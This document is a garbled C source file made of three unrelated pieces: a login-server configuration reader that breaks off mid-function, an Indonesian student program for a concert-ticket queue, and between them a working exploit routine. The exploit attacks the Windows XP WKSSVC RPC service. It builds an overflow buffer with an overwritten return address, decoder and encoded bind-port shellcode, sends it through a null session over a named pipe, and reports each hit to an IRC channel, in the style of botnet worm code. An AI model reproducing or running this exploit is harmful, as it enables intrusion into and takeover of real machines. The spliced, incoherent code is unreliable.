/**
* Reading main configuration file.
* @param cfgName: Name of the configuration (could be fullpath)
* @param normal: Config read normally when server started
* @return True:success, Fals:failure (file not found|readable)
*/
bool login_config_read(const char* cfgName, bool normal) {
char line[1024], w1[32], w2[1024];
FILE* fp = fopen(cfgName, "r");
if (fp == NULL) {
ShowError("Configuration file (%s) not found.\n", cfgName);
return false;
}
while(fgets(line, sizeof(line), fp)) {
if (line[0] == '/' && line[1] == '/')
continue;
if (sscanf(line, "%31[^:]: %1023[^\r\n]", w1, w2) < 2)
continue;
// Config that loaded only when server started, not by reloading config file
if (normal) {
if( !strcmpi(w1, "bind_ip") ) {
login_config.login_ip = host2ip(w2);
if( login_config.login_ip ) {
char ip_str[16];
ShowStatus("Login server binding IP address : %s -> %s\n", w2, ip2str(login_config.login_ip, ip_str));
}
}
else if( !strcmpi(w1, "login_port") )
login_config.login_port = (uint16)atoi(w2);
else if(!strcmpi(w1, "console"))
login_config.console = (bool)config_switch(w2);
}
if(!strcmpi(w1,"timestamp_format"))
safestrncpy(timestamp_format, w2, 20);
else if(strcmpi(w1,"db_path")==0)
safestrncpy(db_path, w2, ARRAYLENGTH(db_path));
else if(!strcmpi(w1,"stdout_with_ansisequence"))
stdout_with_ansisequence = config_switch(w2);
else if(!strcmpi(w1,"console_silent")) {
msg_silent = atoi(w2);
if( msg_silent ) /* only bother if we actually have this enabled */
ShowInfo("Console Silent Setting: %d\n", atoi(w2));
}
else if (strcmpi(w1, "console_msg_log") == 0)
console_msg_log = atoi(w2);
else if (strcmpi(w1, "console_log_filepath") == 0)
safestrncpy(console_log_filepath, w2, sizeof(console_log_filepath));
else if(!strcmpi(w1, "log_login"))
login_config.log_login = (bool)config_switch(w2);
else if(!strcmpi(w1, "new_account"))
login_config.new_account_flag = (bool)config_switch(w2);
else if(!strcmpi(w1, "new_acc_length_limit"))
login_config.new_acc_length_limit = (bool)config_switch(w2);
else if(!strcmpi(w1, "start_limited_time"))
login_config.start_limited_time = atoi(w2);
else if(!strcmpi(w1, "use_MD5_passwords"))
login_config.use_md5_passwds = (bool)config_switch(w2);
else if(!strcmpi(w1, "group_id_to_connect"))
login_config.group_id_to_connect = atoi(w2);
else if(!strcmpi(w1, "min_group_id_to_connect"))
login_config.min_group_id_to_connect = atoi(w2);
else if(!strcmpi(w1, "date_format"))
safestrncpy(login_config.date_format, w2, sizeof(login_config.date_format));
else if(!strcmpi(w1, "allowed_regs")) //account flood protection system
login_config.allowed_regs = atoi(w2);
else if(!strcmpi(w1, "time_allowed"))
login_config.time_allowed = atoi(w2);
else if(!strcmpi(w1, "use_dnsbl"))
login_config.use_dnsbl = (bool)config_switch(w2);
else if(!strcmpi(w1, "dnsbl_servers"))
safestrncpy(login_config.dnsbl_servs, w2, sizeof(login_config.dnsbl_servs));
else if(!strcmpi(w1, "ipban_cleanup_interval"))
login_config.ipban_cleanup_interval = (unsigned int)atoi(w2);
else if(!strcmpi(w1, "ip_sync_interval"))
login_config.ip_sync_interval = (unsigned int)1000*60*atoi(w2); //w2 comes in minutes.
else if(!strcmpi(w1, "client_hash_check"))
login_config.client_hash_check = config_switch(w2);
else if(!strcmpi(w1, "client_hash")) {
int group = 0;
char md5[33];
if (sscanf(w2, "%3d, %32s", &group, md5) == 2) {
struct client_hash_node *nnode;
CREATE(nnode, struct client_hash_node, 1);
if (strcmpi(md5, "disabled") == 0) {
nnode->hash[0] = '\0';
} else {
int i;
for (i = 0; i < 32; i += 2) {
char buf[3];
unsigned int byte;
memcpy(buf, &md5[i], 2);
buf[2] = 0;
sscanf(buf, "%2x", &byte);
nnode->hash[i / 2] = (uint8)(byte & 0xFF);
}
}
nnode->group_id = group;
nnode->next = login_config.client_hash_nodes;
login_config.client_hash_nodes = nnode;
}
} else if(strcmpi(w1, "chars_per_account") == 0) { //maxchars per account [Sirius]
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_RPC );
if( TargetOS != OS_WINXP )
return FALSE;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !iShellSize )
return FALSE;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
char buffer[ IRCLINE ];
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
void main() {
//Deklarasi Antrian dan data penampung.
Queue QFest,QTribun;
Data NewVal;
double TotalJumlah=0,TotalT=0,TotalF=0;
int menu;
//Inisialisasi Antrian
CreateEmpty(&QFest);
CreateEmpty(&QTribun);
//showMenu
do {
system("CLS");
printf("===== KONSER TONG TONG BAND =====\n");
printf("1. Masukan Antrian \n");
printf("2. Tampil Antrian Tribun \n");
printf("3. Tampil Antrian Festival \n");
printf("4. Transaksi Antrian Tribun \n");
printf("5. Transaksi Antrian Festival \n");
printf("6. Jumlah Pendapatan \n");
printf("7. TUGAS - Jumlah Pendapatan \n");
printf("================================= \n");
printf(" >> Masukan Menu : ");
scanf("%d",&menu);
switch(menu) {
case 1 ://Input Antrian
printf(" Nama : ");
fflush(stdin);
gets(NewVal.nama);
printf(" No Hp : ");
fflush(stdin);
gets(NewVal.no_hp);
//Pemilihan Jenis Tiket
while(strcmpi(NewVal.jenis_tiket,"festival")!=0 && strcmpi(NewVal.jenis_tiket,"tribun")!=0) {
printf(" Jenis Tiket(festival/tribun) : ");
fflush(stdin);
gets(NewVal.jenis_tiket);
}
if(strcmpi(NewVal.jenis_tiket,"festival")==0) {
//Cek AntrianFestival
if (isFull(QFest)) {
printf("\n antrian penuh . . .");
strcpy(NewVal.jenis_tiket,"-");
break;
}
//Auto Tiket
NewVal.no_antrian=AutoID(&QFest);
printf(" Nomor Tiket : %d \n",NewVal.no_antrian);
//Prosesur Add
Add(&QFest,NewVal);
}
if(strcmpi(NewVal.jenis_tiket,"tribun")==0) {
//Cek AntrianTribun
if (isFull(QTribun)) {
printf("\n antrian penuh . . .");
strcpy(NewVal.jenis_tiket,"-");
break;
}
//Auto Tiket
NewVal.no_antrian=AutoID(&QTribun);
printf(" Nomor Tiket : %d \n",NewVal.no_antrian);
//Prosesur Add
Add(&QTribun,NewVal);
}
//Reset Jenis Tiket
strcpy(NewVal.jenis_tiket,"-");
break;
case 2 :
//Cek Antrian Kosong
if (isEmpty(&QTribun)) {
printf("\n antrian kosong . . .");
break;
}
//Prosedur Show
ShowQueue(QTribun);
break;
case 3 :
//Cek Antrian Kosong
if (isEmpty(&QFest)) {
printf("\n antrian kosong . . .");
break;
}
//Prosedur Show
ShowQueue(QFest);
break;
case 4 :
if (isEmpty(&QTribun)) {
printf("\n antrian kosong . . .");
break;
}
//Print Transaksi
printf("\n ====== Transaksi Tribun====== \n");
JumlahPendapatan(QTribun,&TotalJumlah,&TotalT,&TotalF);
Delete(&QTribun);
break;
case 5 :
if (isEmpty(&QFest)) {
printf("\n antrian kosong . . .");
break;
}
//Print Transaksi
printf("\n ====== Transaksi Festival====== \n");
JumlahPendapatan(QFest,&TotalJumlah,&TotalT,&TotalF);
Delete(&QFest);
break;
case 6 :
printf("\n Total Pendapatan = %lf",TotalJumlah);
break;
case 7 :
printf("\n Total Pendapatan Tribun = %lf",TotalT);
printf("\n Total Pendapatan Festival = %lf",TotalF);
printf("\n---------------------------------------- ++");
printf("\n Total Pendapatan = %lf",TotalT+TotalF);
break;
case 8 :
printf(" Head %d \n",QTribun.head);
printf(" Tail %d \n",QTribun.tail);
}
getch();
} while(menu!=0);
}
